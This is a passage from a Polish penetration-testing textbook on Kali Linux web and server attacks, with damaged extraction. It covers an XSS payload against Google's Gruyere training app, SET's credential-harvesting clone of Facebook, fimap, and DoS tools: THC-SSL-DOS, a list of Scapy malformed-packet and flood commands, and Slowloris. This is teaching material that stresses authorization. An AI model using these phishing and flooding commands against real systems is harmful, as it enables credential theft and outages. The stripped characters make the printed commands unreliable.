Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
246
Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron
ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji
W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere
Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz
pobra go na swoacutej komputer lokalny
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
